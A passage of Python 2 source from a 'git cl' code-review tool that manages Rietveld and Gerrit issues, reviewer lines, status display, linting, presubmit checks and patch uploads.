"""Return the configured remote URL, e.g. 'git://example.org/foo.git/'.
Returns None if there is no remote.
"""
remote, _ = self.GetRemoteBranch()
url = RunGit(['config', 'remote.%s.url' % remote], error_ok=True).strip()
# If URL is pointing to a local directory, it is probably a git cache.
if os.path.isdir(url):
url = RunGit(['config', 'remote.%s.url' % remote],
error_ok=True,
cwd=url).strip()
return url
def GetIssue(self):
"""Returns the issue number as a int or None if not set."""
if self.issue is None and not self.lookedup_issue:
issue = RunGit(['config', self._IssueSetting()], error_ok=True).strip()
self.issue = int(issue) or None if issue else None
self.lookedup_issue = True
return self.issue
def GetRietveldServer(self):
if not self.rietveld_server:
# If we're on a branch then get the server potentially associated
# with that branch.
if self.GetIssue():
rietveld_server_config = self._RietveldServer()
if rietveld_server_config:
self.rietveld_server = gclient_utils.UpgradeToHttps(RunGit(
['config', rietveld_server_config], error_ok=True).strip())
if not self.rietveld_server:
self.rietveld_server = settings.GetDefaultServerUrl()
return self.rietveld_server
def GetIssueURL(self):
"""Get the URL for a particular issue."""
if not self.GetIssue():
return None
return '%s/%s' % (self.GetRietveldServer(), self.GetIssue())
def GetDescription(self, pretty=False):
if not self.has_description:
if self.GetIssue():
issue = self.GetIssue()
try:
self.description = self.RpcServer().get_description(issue).strip()
except urllib2.HTTPError as e:
if e.code == 404:
DieWithError(
('\nWhile fetching the description for issue %d, received a '
'404 (not found)\n'
'error. It is likely that you deleted this '
'issue on the server. If this is the\n'
'case, please run\n\n'
' git cl issue 0\n\n'
'to clear the association with the deleted issue. Then run '
'this command again.') % issue)
else:
DieWithError(
'\nFailed to fetch issue description. HTTP error %d' % e.code)
except urllib2.URLError as e:
print >> sys.stderr, (
'Warning: Failed to retrieve CL description due to network '
'failure.')
self.description = ''
self.has_description = True
if pretty:
wrapper = textwrap.TextWrapper()
wrapper.initial_indent = wrapper.subsequent_indent = ' '
return wrapper.fill(self.description)
return self.description
def GetPatchset(self):
"""Returns the patchset number as a int or None if not set."""
if self.patchset is None and not self.lookedup_patchset:
patchset = RunGit(['config', self._PatchsetSetting()],
error_ok=True).strip()
self.patchset = int(patchset) or None if patchset else None
self.lookedup_patchset = True
return self.patchset
def SetPatchset(self, patchset):
"""Set this branch's patchset. If patchset=0, clears the patchset."""
if patchset:
RunGit(['config', self._PatchsetSetting(), str(patchset)])
self.patchset = patchset
else:
RunGit(['config', '--unset', self._PatchsetSetting()],
stderr=subprocess2.PIPE, error_ok=True)
self.patchset = None
def GetMostRecentPatchset(self):
return self.GetIssueProperties()['patchsets'][-1]
def GetPatchSetDiff(self, issue, patchset):
return self.RpcServer().get(
'/download/issue%s_%s.diff' % (issue, patchset))
def GetIssueProperties(self):
if self._props is None:
issue = self.GetIssue()
if not issue:
self._props = {}
else:
self._props = self.RpcServer().get_issue_properties(issue, True)
return self._props
def GetApprovingReviewers(self):
return get_approving_reviewers(self.GetIssueProperties())
def AddComment(self, message):
return self.RpcServer().add_comment(self.GetIssue(), message)
def SetIssue(self, issue):
"""Set this branch's issue. If issue=0, clears the issue."""
if issue:
self.issue = issue
RunGit(['config', self._IssueSetting(), str(issue)])
if self.rietveld_server:
RunGit(['config', self._RietveldServer(), self.rietveld_server])
else:
current_issue = self.GetIssue()
if current_issue:
RunGit(['config', '--unset', self._IssueSetting()])
self.issue = None
self.SetPatchset(None)
def GetChange(self, upstream_branch, author):
if not self.GitSanityChecks(upstream_branch):
DieWithError('\nGit sanity check failure')
root = settings.GetRelativeRoot()
if not root:
root = '.'
absroot = os.path.abspath(root)
# We use the sha1 of HEAD as a name of this change.
name = RunGitWithCode(['rev-parse', 'HEAD'])[1].strip()
# Need to pass a relative path for msysgit.
try:
files = scm.GIT.CaptureStatus([root], '.', upstream_branch)
except subprocess2.CalledProcessError:
DieWithError(
('\nFailed to diff against upstream branch %s\n\n'
'This branch probably doesn\'t exist anymore. To reset the\n'
'tracking branch, please run\n'
' git branch --set-upstream %s trunk\n'
'replacing trunk with origin/master or the relevant branch') %
(upstream_branch, self.GetBranch()))
issue = self.GetIssue()
patchset = self.GetPatchset()
if issue:
description = self.GetDescription()
else:
# If the change was never uploaded, use the log messages of all commits
# up to the branch point, as git cl upload will prefill the description
# with these log messages.
args = ['log', '--pretty=format:%s%n%n%b', '%s...' % (upstream_branch)]
description = RunGitWithCode(args)[1].strip()
if not author:
author = RunGit(['config', 'user.email']).strip() or None
return presubmit_support.GitChange(
name,
description,
absroot,
files,
issue,
patchset,
author,
upstream=upstream_branch)
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or one of the following keywords:
* 'error' - error from review tool (including deleted issues)
* 'unsent' - not sent for review
* 'waiting' - waiting for review
* 'reply' - waiting for owner to reply to review
* 'lgtm' - LGTM from at least one approved reviewer
* 'commit' - in the commit queue
* 'closed' - closed
"""
if not self.GetIssue():
return None
try:
props = self.GetIssueProperties()
except urllib2.HTTPError:
return 'error'
if props.get('closed'):
# Issue is closed.
return 'closed'
if props.get('commit'):
# Issue is in the commit queue.
return 'commit'
try:
reviewers = self.GetApprovingReviewers()
except urllib2.HTTPError:
return 'error'
if reviewers:
# Was LGTM'ed.
return 'lgtm'
messages = props.get('messages') or []
if not messages:
# No message was sent.
return 'unsent'
if messages[-1]['sender'] != props.get('owner_email'):
# Non-LGTM reply from non-owner
return 'reply'
return 'waiting'
def RunHook(self, committing, may_prompt, verbose, change):
"""Calls sys.exit() if the hook fails; returns a HookResults otherwise."""
try:
return presubmit_support.DoPresubmitChecks(change, committing,
verbose=verbose, output_stream=sys.stdout, input_stream=sys.stdin,
default_presubmit=None, may_prompt=may_prompt,
rietveld_obj=self.RpcServer())
except presubmit_support.PresubmitFailure, e:
DieWithError(
('%s\nMaybe your depot_tools is out of date?\n'
'If all fails, contact maruel@') % e)
def UpdateDescription(self, description):
self.description = description
return self.RpcServer().update_description(
self.GetIssue(), self.description)
def CloseIssue(self):
"""Updates the description and closes the issue."""
return self.RpcServer().close_issue(self.GetIssue())
def SetFlag(self, flag, value):
"""Patchset must match."""
if not self.GetPatchset():
DieWithError('The patchset needs to match. Send another patchset.')
try:
return self.RpcServer().set_flag(
self.GetIssue(), self.GetPatchset(), flag, value)
except urllib2.HTTPError, e:
if e.code == 404:
DieWithError('The issue %s doesn\'t exist.' % self.GetIssue())
if e.code == 403:
DieWithError(
('Access denied to issue %s. Maybe the patchset %s doesn\'t '
'match?') % (self.GetIssue(), self.GetPatchset()))
raise
def RpcServer(self):
"""Returns an upload.RpcServer() to access this review's rietveld instance.
"""
if not self._rpc_server:
self._rpc_server = rietveld.CachingRietveld(
self.GetRietveldServer(), None, None)
return self._rpc_server
def _IssueSetting(self):
"""Return the git setting that stores this change's issue."""
return 'branch.%s.rietveldissue' % self.GetBranch()
def _PatchsetSetting(self):
"""Return the git setting that stores this change's most recent patchset."""
return 'branch.%s.rietveldpatchset' % self.GetBranch()
def _RietveldServer(self):
"""Returns the git setting that stores this change's rietveld server."""
branch = self.GetBranch()
if branch:
return 'branch.%s.rietveldserver' % branch
return None
def GetCodereviewSettingsInteractively():
"""Prompt the user for settings."""
  # TODO(ukai): ask whether the code review system is rietveld or gerrit?
server = settings.GetDefaultServerUrl(error_ok=True)
prompt = 'Rietveld server (host[:port])'
prompt += ' [%s]' % (server or DEFAULT_SERVER)
newserver = ask_for_data(prompt + ':')
if not server and not newserver:
newserver = DEFAULT_SERVER
if newserver:
newserver = gclient_utils.UpgradeToHttps(newserver)
if newserver != server:
RunGit(['config', 'rietveld.server', newserver])
def SetProperty(initial, caption, name, is_url):
prompt = caption
if initial:
prompt += ' ("x" to clear) [%s]' % initial
new_val = ask_for_data(prompt + ':')
if new_val == 'x':
RunGit(['config', '--unset-all', 'rietveld.' + name], error_ok=True)
elif new_val:
if is_url:
new_val = gclient_utils.UpgradeToHttps(new_val)
if new_val != initial:
RunGit(['config', 'rietveld.' + name, new_val])
SetProperty(settings.GetDefaultCCList(), 'CC list', 'cc', False)
SetProperty(settings.GetDefaultPrivateFlag(),
'Private flag (rietveld only)', 'private', False)
SetProperty(settings.GetTreeStatusUrl(error_ok=True), 'Tree status URL',
'tree-status-url', False)
SetProperty(settings.GetViewVCUrl(), 'ViewVC URL', 'viewvc-url', True)
SetProperty(settings.GetBugPrefix(), 'Bug Prefix', 'bug-prefix', False)
# TODO: configure a default branch to diff against, rather than this
# svn-based hackery.
class ChangeDescription(object):
"""Contains a parsed form of the change description."""
R_LINE = r'^[ \t]*(TBR|R)[ \t]*=[ \t]*(.*?)[ \t]*$'
BUG_LINE = r'^[ \t]*(BUG)[ \t]*=[ \t]*(.*?)[ \t]*$'
def __init__(self, description):
self._description_lines = (description or '').strip().splitlines()
@property # www.logilab.org/ticket/89786
def description(self): # pylint: disable=E0202
return '\n'.join(self._description_lines)
def set_description(self, desc):
if isinstance(desc, basestring):
lines = desc.splitlines()
else:
lines = [line.rstrip() for line in desc]
while lines and not lines[0]:
lines.pop(0)
while lines and not lines[-1]:
lines.pop(-1)
self._description_lines = lines
def update_reviewers(self, reviewers, add_owners_tbr=False, change=None):
"""Rewrites the R=/TBR= line(s) as a single line each."""
assert isinstance(reviewers, list), reviewers
if not reviewers and not add_owners_tbr:
return
reviewers = reviewers[:]
    # Get the set of R= and TBR= lines and remove them from the description.
regexp = re.compile(self.R_LINE)
matches = [regexp.match(line) for line in self._description_lines]
new_desc = [l for i, l in enumerate(self._description_lines)
if not matches[i]]
self.set_description(new_desc)
# Construct new unified R= and TBR= lines.
r_names = []
tbr_names = []
for match in matches:
if not match:
continue
people = cleanup_list([match.group(2).strip()])
if match.group(1) == 'TBR':
tbr_names.extend(people)
else:
r_names.extend(people)
for name in r_names:
if name not in reviewers:
reviewers.append(name)
if add_owners_tbr:
owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=os.path, glob=glob.glob)
all_reviewers = set(tbr_names + reviewers)
missing_files = owners_db.files_not_covered_by(change.LocalPaths(),
all_reviewers)
tbr_names.extend(owners_db.reviewers_for(missing_files,
change.author_email))
new_r_line = 'R=' + ', '.join(reviewers) if reviewers else None
new_tbr_line = 'TBR=' + ', '.join(tbr_names) if tbr_names else None
# Put the new lines in the description where the old first R= line was.
line_loc = next((i for i, match in enumerate(matches) if match), -1)
if 0 <= line_loc < len(self._description_lines):
if new_tbr_line:
self._description_lines.insert(line_loc, new_tbr_line)
if new_r_line:
self._description_lines.insert(line_loc, new_r_line)
else:
if new_r_line:
self.append_footer(new_r_line)
if new_tbr_line:
self.append_footer(new_tbr_line)
def prompt(self):
"""Asks the user to update the description."""
self.set_description([
'# Enter a description of the change.',
'# This will be displayed on the codereview site.',
'# The first line will also be used as the subject of the review.',
'#--------------------This line is 72 characters long'
'--------------------',
] + self._description_lines)
regexp = re.compile(self.BUG_LINE)
if not any((regexp.match(line) for line in self._description_lines)):
self.append_footer('BUG=%s' % settings.GetBugPrefix())
content = gclient_utils.RunEditor(self.description, True,
git_editor=settings.GetGitEditor())
if not content:
DieWithError('Running editor failed')
lines = content.splitlines()
# Strip off comments.
clean_lines = [line.rstrip() for line in lines if not line.startswith('#')]
if not clean_lines:
DieWithError('No CL description, aborting')
self.set_description(clean_lines)
def append_footer(self, line):
if self._description_lines:
# Add an empty line if either the last line or the new line isn't a tag.
last_line = self._description_lines[-1]
if (not presubmit_support.Change.TAG_LINE_RE.match(last_line) or
not presubmit_support.Change.TAG_LINE_RE.match(line)):
self._description_lines.append('')
self._description_lines.append(line)
def get_reviewers(self):
"""Retrieves the list of reviewers."""
matches = [re.match(self.R_LINE, line) for line in self._description_lines]
reviewers = [match.group(2).strip() for match in matches if match]
return cleanup_list(reviewers)
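# A rough example of how the class above parses reviewer lines (the addresses
# are hypothetical): a description containing "R=joe@chromium.org" and
# "TBR=jane@chromium.org" makes get_reviewers() return
# ['jane@chromium.org', 'joe@chromium.org'] -- R_LINE matches both prefixes,
# and cleanup_list() sorts the result.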
def get_approving_reviewers(props):
"""Retrieves the reviewers that approved a CL from the issue properties with
messages.
  Note that the list may contain reviewers that are not committers, and thus
  are not considered by the CQ.
"""
return sorted(
set(
message['sender']
for message in props['messages']
if message['approval'] and message['sender'] in props['reviewers']
)
)
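# A rough sketch of the issue-properties shape the function above expects
# (field names are taken from the lookups above; the values are hypothetical):
#   props = {
#     'reviewers': ['rev@example.com'],
#     'messages': [
#       {'sender': 'rev@example.com', 'approval': True},    # counted
#       {'sender': 'other@example.com', 'approval': True},  # not a reviewer
#     ],
#   }
#   get_approving_reviewers(props) == ['rev@example.com']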
def FindCodereviewSettingsFile(filename='codereview.settings'):
"""Finds the given file starting in the cwd and going up.
Only looks up to the top of the repository unless an
'inherit-review-settings-ok' file exists in the root of the repository.
"""
inherit_ok_file = 'inherit-review-settings-ok'
cwd = os.getcwd()
root = settings.GetRoot()
if os.path.isfile(os.path.join(root, inherit_ok_file)):
root = '/'
while True:
if filename in os.listdir(cwd):
if os.path.isfile(os.path.join(cwd, filename)):
return open(os.path.join(cwd, filename))
if cwd == root:
break
cwd = os.path.dirname(cwd)
def LoadCodereviewSettingsFromFile(fileobj):
"""Parse a codereview.settings file and updates hooks."""
keyvals = gclient_utils.ParseCodereviewSettingsContent(fileobj.read())
def SetProperty(name, setting, unset_error_ok=False):
fullname = 'rietveld.' + name
if setting in keyvals:
RunGit(['config', fullname, keyvals[setting]])
else:
RunGit(['config', '--unset-all', fullname], error_ok=unset_error_ok)
SetProperty('server', 'CODE_REVIEW_SERVER')
# Only server setting is required. Other settings can be absent.
# In that case, we ignore errors raised during option deletion attempt.
SetProperty('cc', 'CC_LIST', unset_error_ok=True)
SetProperty('private', 'PRIVATE', unset_error_ok=True)
SetProperty('tree-status-url', 'STATUS', unset_error_ok=True)
SetProperty('viewvc-url', 'VIEW_VC', unset_error_ok=True)
SetProperty('bug-prefix', 'BUG_PREFIX', unset_error_ok=True)
SetProperty('cpplint-regex', 'LINT_REGEX', unset_error_ok=True)
SetProperty('force-https-commit-url', 'FORCE_HTTPS_COMMIT_URL',
unset_error_ok=True)
SetProperty('cpplint-ignore-regex', 'LINT_IGNORE_REGEX', unset_error_ok=True)
SetProperty('project', 'PROJECT', unset_error_ok=True)
SetProperty('pending-ref-prefix', 'PENDING_REF_PREFIX', unset_error_ok=True)
if 'GERRIT_HOST' in keyvals:
RunGit(['config', 'gerrit.host', keyvals['GERRIT_HOST']])
if 'PUSH_URL_CONFIG' in keyvals and 'ORIGIN_URL_CONFIG' in keyvals:
#should be of the form
#PUSH_URL_CONFIG: url.ssh://gitrw.chromium.org.pushinsteadof
#ORIGIN_URL_CONFIG: http://src.chromium.org/git
RunGit(['config', keyvals['PUSH_URL_CONFIG'],
keyvals['ORIGIN_URL_CONFIG']])
def urlretrieve(source, destination):
"""urllib is broken for SSL connections via a proxy therefore we
can't use urllib.urlretrieve()."""
with open(destination, 'w') as f:
f.write(urllib2.urlopen(source).read())
def hasSheBang(fname):
"""Checks fname is a #! script."""
with open(fname) as f:
return f.read(2).startswith('#!')
def DownloadHooks(force):
"""downloads hooks
Args:
force: True to update hooks. False to install hooks if not present.
"""
if not settings.GetIsGerrit():
return
src = 'https://gerrit-review.googlesource.com/tools/hooks/commit-msg'
dst = os.path.join(settings.GetRoot(), '.git', 'hooks', 'commit-msg')
if not os.access(dst, os.X_OK):
if os.path.exists(dst):
if not force:
return
try:
urlretrieve(src, dst)
if not hasSheBang(dst):
DieWithError('Not a script: %s\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % (dst, src))
os.chmod(dst, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
except Exception:
if os.path.exists(dst):
os.remove(dst)
DieWithError('\nFailed to download hooks.\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % src)
@subcommand.usage('[repo root containing codereview.settings]')
def CMDconfig(parser, args):
"""Edits configuration for this tree."""
parser.add_option('--activate-update', action='store_true',
help='activate auto-updating [rietveld] section in '
'.git/config')
parser.add_option('--deactivate-update', action='store_true',
help='deactivate auto-updating [rietveld] section in '
'.git/config')
options, args = parser.parse_args(args)
if options.deactivate_update:
RunGit(['config', 'rietveld.autoupdate', 'false'])
return
if options.activate_update:
RunGit(['config', '--unset', 'rietveld.autoupdate'])
return
if len(args) == 0:
GetCodereviewSettingsInteractively()
DownloadHooks(True)
return 0
url = args[0]
if not url.endswith('codereview.settings'):
url = os.path.join(url, 'codereview.settings')
# Load code review settings and download hooks (if available).
LoadCodereviewSettingsFromFile(urllib2.urlopen(url))
DownloadHooks(True)
return 0
def CMDbaseurl(parser, args):
"""Gets or sets base-url for this branch."""
branchref = RunGit(['symbolic-ref', 'HEAD']).strip()
branch = ShortBranchName(branchref)
_, args = parser.parse_args(args)
if not args:
print("Current base-url:")
return RunGit(['config', 'branch.%s.base-url' % branch],
error_ok=False).strip()
else:
print("Setting base-url to %s" % args[0])
return RunGit(['config', 'branch.%s.base-url' % branch, args[0]],
error_ok=False).strip()
def color_for_status(status):
"""Maps a Changelist status to color, for CMDstatus and other tools."""
return {
'unsent': Fore.RED,
'waiting': Fore.BLUE,
'reply': Fore.YELLOW,
'lgtm': Fore.GREEN,
'commit': Fore.MAGENTA,
'closed': Fore.CYAN,
'error': Fore.WHITE,
}.get(status, Fore.WHITE)
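# For example, color_for_status('lgtm') yields Fore.GREEN, while any status
# string not listed above (or None) falls back to Fore.WHITE via dict.get().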
def CMDstatus(parser, args):
"""Show status of changelists.
Colors are used to tell the state of the CL unless --fast is used:
- Red not sent for review or broken
- Blue waiting for review
- Yellow waiting for you to reply to review
- Green LGTM'ed
- Magenta in the commit queue
- Cyan was committed, branch can be deleted
Also see 'git cl comments'.
"""
parser.add_option('--field',
help='print only specific field (desc|id|patch|url)')
parser.add_option('-f', '--fast', action='store_true',
help='Do not retrieve review status')
(options, args) = parser.parse_args(args)
if args:
parser.error('Unsupported args: %s' % args)
if options.field:
cl = Changelist()
if options.field.startswith('desc'):
print cl.GetDescription()
elif options.field == 'id':
issueid = cl.GetIssue()
if issueid:
print issueid
elif options.field == 'patch':
patchset = cl.GetPatchset()
if patchset:
print patchset
elif options.field == 'url':
url = cl.GetIssueURL()
if url:
print url
return 0
branches = RunGit(['for-each-ref', '--format=%(refname)', 'refs/heads'])
if not branches:
print('No local branch found.')
return 0
changes = (Changelist(branchref=b) for b in branches.splitlines())
branches = [c.GetBranch() for c in changes]
alignment = max(5, max(len(b) for b in branches))
print 'Branches associated with reviews:'
# Adhoc thread pool to request data concurrently.
output = Queue.Queue()
  # Silence upload.py, otherwise it becomes unwieldy.
upload.verbosity = 0
if not options.fast:
def fetch(b):
"""Fetches information for an issue and returns (branch, issue, color)."""
c = Changelist(branchref=b)
i = c.GetIssueURL()
status = c.GetStatus()
color = color_for_status(status)
if i and (not status or status == 'error'):
# The issue probably doesn't exist anymore.
i += ' (broken)'
output.put((b, i, color))
# Process one branch synchronously to work through authentication, then
# spawn threads to process all the other branches in parallel.
if branches:
fetch(branches[0])
threads = [
threading.Thread(target=fetch, args=(b,)) for b in branches[1:]]
for t in threads:
t.daemon = True
t.start()
else:
# Do not use GetApprovingReviewers(), since it requires an HTTP request.
for b in branches:
c = Changelist(branchref=b)
url = c.GetIssueURL()
output.put((b, url, Fore.BLUE if url else Fore.WHITE))
tmp = {}
alignment = max(5, max(len(ShortBranchName(b)) for b in branches))
for branch in sorted(branches):
while branch not in tmp:
b, i, color = output.get()
tmp[b] = (i, color)
issue, color = tmp.pop(branch)
reset = Fore.RESET
if not sys.stdout.isatty():
color = ''
reset = ''
print ' %*s : %s%s%s' % (
alignment, ShortBranchName(branch), color, issue, reset)
cl = Changelist()
print
print 'Current branch:',
if not cl.GetIssue():
print 'no issue assigned.'
return 0
print cl.GetBranch()
print 'Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL())
if not options.fast:
print 'Issue description:'
print cl.GetDescription(pretty=True)
return 0
def colorize_CMDstatus_doc():
"""To be called once in main() to add colors to git cl status help."""
colors = [i for i in dir(Fore) if i[0].isupper()]
def colorize_line(line):
for color in colors:
if color in line.upper():
# Extract whitespaces first and the leading '-'.
indent = len(line) - len(line.lstrip(' ')) + 1
return line[:indent] + getattr(Fore, color) + line[indent:] + Fore.RESET
return line
lines = CMDstatus.__doc__.splitlines()
CMDstatus.__doc__ = '\n'.join(colorize_line(l) for l in lines)
@subcommand.usage('[issue_number]')
def CMDissue(parser, args):
"""Sets or displays the current code review issue number.
Pass issue number 0 to clear the current issue.
"""
_, args = parser.parse_args(args)
cl = Changelist()
if len(args) > 0:
try:
issue = int(args[0])
except ValueError:
DieWithError('Pass a number to set the issue or none to list it.\n'
'Maybe you want to run git cl status?')
cl.SetIssue(issue)
print 'Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL())
return 0
def CMDcomments(parser, args):
"""Shows or posts review comments for any changelist."""
parser.add_option('-a', '--add-comment', dest='comment',
help='comment to add to an issue')
parser.add_option('-i', dest='issue',
help="review issue id (defaults to current issue)")
options, args = parser.parse_args(args)
issue = None
if options.issue:
try:
issue = int(options.issue)
except ValueError:
DieWithError('A review issue id is expected to be a number')
cl = Changelist(issue=issue)
if options.comment:
cl.AddComment(options.comment)
return 0
data = cl.GetIssueProperties()
for message in sorted(data.get('messages', []), key=lambda x: x['date']):
if message['disapproval']:
color = Fore.RED
elif message['approval']:
color = Fore.GREEN
elif message['sender'] == data['owner_email']:
color = Fore.MAGENTA
else:
color = Fore.BLUE
print '\n%s%s %s%s' % (
color, message['date'].split('.', 1)[0], message['sender'],
Fore.RESET)
if message['text'].strip():
print '\n'.join(' ' + l for l in message['text'].splitlines())
return 0
def CMDdescription(parser, args):
"""Brings up the editor for the current CL's description."""
cl = Changelist()
if not cl.GetIssue():
DieWithError('This branch has no associated changelist.')
description = ChangeDescription(cl.GetDescription())
description.prompt()
cl.UpdateDescription(description.description)
return 0
def CreateDescriptionFromLog(args):
"""Pulls out the commit log to use as a base for the CL description."""
log_args = []
if len(args) == 1 and not args[0].endswith('.'):
log_args = [args[0] + '..']
elif len(args) == 1 and args[0].endswith('...'):
log_args = [args[0][:-1]]
elif len(args) == 2:
log_args = [args[0] + '..' + args[1]]
else:
log_args = args[:] # Hope for the best!
return RunGit(['log', '--pretty=format:%s\n\n%b'] + log_args)
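# A quick sketch of how the positional args map to the underlying `git log`
# range (the branch names below are hypothetical):
#   ['some-branch']     -> git log some-branch..       (changes since the base)
#   ['a...']            -> git log a..                 (trailing dot trimmed)
#   ['base', 'feature'] -> git log base..feature
# Anything else is passed through to `git log` unchanged.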
def CMDlint(parser, args):
"""Runs cpplint on the current changelist."""
parser.add_option('--filter', action='append', metavar='-x,+y',
help='Comma-separated list of cpplint\'s category-filters')
(options, args) = parser.parse_args(args)
# Access to a protected member _XX of a client class
# pylint: disable=W0212
try:
import cpplint
import cpplint_chromium
except ImportError:
print "Your depot_tools is missing cpplint.py and/or cpplint_chromium.py."
return 1
# Change the current working directory before calling lint so that it
# shows the correct base.
previous_cwd = os.getcwd()
os.chdir(settings.GetRoot())
try:
cl = Changelist()
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
files = [f.LocalPath() for f in change.AffectedFiles()]
if not files:
print "Cannot lint an empty CL"
return 1
    # Process cpplint's arguments, if any.
command = args + files
if options.filter:
command = ['--filter=' + ','.join(options.filter)] + command
filenames = cpplint.ParseArguments(command)
white_regex = re.compile(settings.GetLintRegex())
black_regex = re.compile(settings.GetLintIgnoreRegex())
extra_check_functions = [cpplint_chromium.CheckPointerDeclarationWhitespace]
for filename in filenames:
if white_regex.match(filename):
if black_regex.match(filename):
print "Ignoring file %s" % filename
else:
cpplint.ProcessFile(filename, cpplint._cpplint_state.verbose_level,
extra_check_functions)
else:
print "Skipping file %s" % filename
finally:
os.chdir(previous_cwd)
print "Total errors found: %d\n" % cpplint._cpplint_state.error_count
if cpplint._cpplint_state.error_count != 0:
return 1
return 0
def CMDpresubmit(parser, args):
"""Runs presubmit tests on the current changelist."""
parser.add_option('-u', '--upload', action='store_true',
help='Run upload hook instead of the push/dcommit hook')
parser.add_option('-f', '--force', action='store_true',
help='Run checks even if tree is dirty')
(options, args) = parser.parse_args(args)
if not options.force and is_dirty_git_tree('presubmit'):
print 'use --force to check even if tree is dirty.'
return 1
cl = Changelist()
if args:
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
cl.RunHook(
committing=not options.upload,
may_prompt=False,
verbose=options.verbose,
change=cl.GetChange(base_branch, None))
return 0
def AddChangeIdToCommitMessage(options, args):
"""Re-commits using the current message, assumes the commit hook is in
place.
"""
log_desc = options.message or CreateDescriptionFromLog(args)
git_command = ['commit', '--amend', '-m', log_desc]
RunGit(git_command)
new_log_desc = CreateDescriptionFromLog(args)
if CHANGE_ID in new_log_desc:
print 'git-cl: Added Change-Id to commit message.'
else:
print >> sys.stderr, 'ERROR: Gerrit commit-msg hook not available.'
def GerritUpload(options, args, cl, change):
"""upload the current branch to gerrit."""
# We assume the remote called "origin" is the one we want.
# It is probably not worthwhile to support different workflows.
remote = 'origin'
branch = 'master'
if options.target_branch:
branch = options.target_branch
change_desc = ChangeDescription(
options.message or CreateDescriptionFromLog(args))
if not change_desc.description:
print "Description is empty; aborting."
return 1
if CHANGE_ID not in change_desc.description:
AddChangeIdToCommitMessage(options, args)
commits = RunGit(['rev-list', '%s/%s..' % (remote, branch)]).splitlines()
if len(commits) > 1:
print('WARNING: This will upload %d commits. Run the following command '
'to see which commits will be uploaded: ' % len(commits))
print('git log %s/%s..' % (remote, branch))
    print('You can also use `git squash-branch` to squash these into a single '
          'commit.')
ask_for_data('About to upload; enter to confirm.')
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers, options.tbr_owners, change)
receive_options = []
cc = cl.GetCCList().split(',')
if options.cc:
cc.extend(options.cc)
cc = filter(None, cc)
if cc:
receive_options += ['--cc=' + email for email in cc]
if change_desc.get_reviewers():
receive_options.extend(
'--reviewer=' + email for email in change_desc.get_reviewers())
git_command = ['push']
if receive_options:
git_command.append('--receive-pack=git receive-pack %s' %
' '.join(receive_options))
git_command += [remote, 'HEAD:refs/for/' + branch]
RunGit(git_command)
# TODO(ukai): parse Change-Id: and set issue number?
return 0
def GetTargetRef(remote, remote_branch, target_branch, pending_prefix):
"""Computes the remote branch ref to use for the CL.
Args:
remote (str): The git remote for the CL.
remote_branch (str): The git remote branch for the CL.
target_branch (str): The target branch specified by the user.
pending_prefix (str): The pending prefix from the settings.
"""
if not (remote and remote_branch):
return None
if target_branch:
    # Canonicalize branch references to the equivalent local full symbolic
# refs, which are then translated into the remote full symbolic refs
# below.
if '/' not in target_branch:
remote_branch = 'refs/remotes/%s/%s' % (remote, target_branch)
else:
prefix_replacements = (
('^((refs/)?remotes/)?branch-heads/', 'refs/remotes/branch-heads/'),
('^((refs/)?remotes/)?%s/' % remote, 'refs/remotes/%s/' % remote),
('^(refs/)?heads/', 'refs/remotes/%s/' % remote),
)
match = None
for regex, replacement in prefix_replacements:
match = re.search(regex, target_branch)
if match:
remote_branch = target_branch.replace(match.group(0), replacement)
break
if not match:
# This is a branch path but not one we recognize; use as-is.
remote_branch = target_branch
elif (not remote_branch.startswith('refs/remotes/branch-heads') and
not remote_branch.startswith('refs/remotes/%s/refs' % remote)):
# Default to master for refs that are not branches.
remote_branch = 'refs/remotes/%s/master' % remote
# Create the true path to the remote branch.
# Does the following translation:
# * refs/remotes/origin/refs/diff/test -> refs/diff/test
# * refs/remotes/origin/master -> refs/heads/master
# * refs/remotes/branch-heads/test -> refs/branch-heads/test
if remote_branch.startswith('refs/remotes/%s/refs/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote, '')
elif remote_branch.startswith('refs/remotes/%s/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote,
'refs/heads/')
elif remote_branch.startswith('refs/remotes/branch-heads'):
remote_branch = remote_branch.replace('refs/remotes/', 'refs/')
# If a pending prefix exists then replace refs/ with it.
if pending_prefix:
remote_branch = remote_branch.replace('refs/', pending_prefix)
return remote_branch
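# A few illustrative translations through GetTargetRef (the remote name
# 'origin' and the branch names are hypothetical; pending_prefix is empty
# unless noted):
#   target_branch 'master'          -> 'refs/heads/master'
#   target_branch 'branch-heads/42' -> 'refs/branch-heads/42'
# With a pending_prefix such as 'refs/pending/', the leading 'refs/' of the
# result is replaced, giving e.g. 'refs/pending/heads/master'.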
def RietveldUpload(options, args, cl, change):
"""upload the patch to rietveld."""
upload_args = ['--assume_yes'] # Don't ask about untracked files.
upload_args.extend(['--server', cl.GetRietveldServer()])
if options.emulate_svn_auto_props:
upload_args.append('--emulate_svn_auto_props')
change_desc = None
if options.email is not None:
upload_args.extend(['--email', options.email])
if cl.GetIssue():
if options.title:
upload_args.extend(['--title', options.title])
if options.message:
upload_args.extend(['--message', options.message])
upload_args.extend(['--issue', str(cl.GetIssue())])
print ("This branch is associated with issue %s. "
"Adding patch to that issue." % cl.GetIssue())
else:
if options.title:
upload_args.extend(['--title', options.title])
message = options.title or options.message or CreateDescriptionFromLog(args)
change_desc = ChangeDescription(message)
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers,
options.tbr_owners,
change)
if not options.force:
change_desc.prompt()
if not change_desc.description:
print "Description is empty; aborting."
return 1
upload_args.extend(['--message', change_desc.description])
if change_desc.get_reviewers():
upload_args.append('--reviewers=' + ','.join(change_desc.get_reviewers()))
if options.send_mail:
if not change_desc.get_reviewers():
DieWithError("Must specify reviewers to send email.")
upload_args.append('--send_mail')
# We check this before applying rietveld.private assuming that in
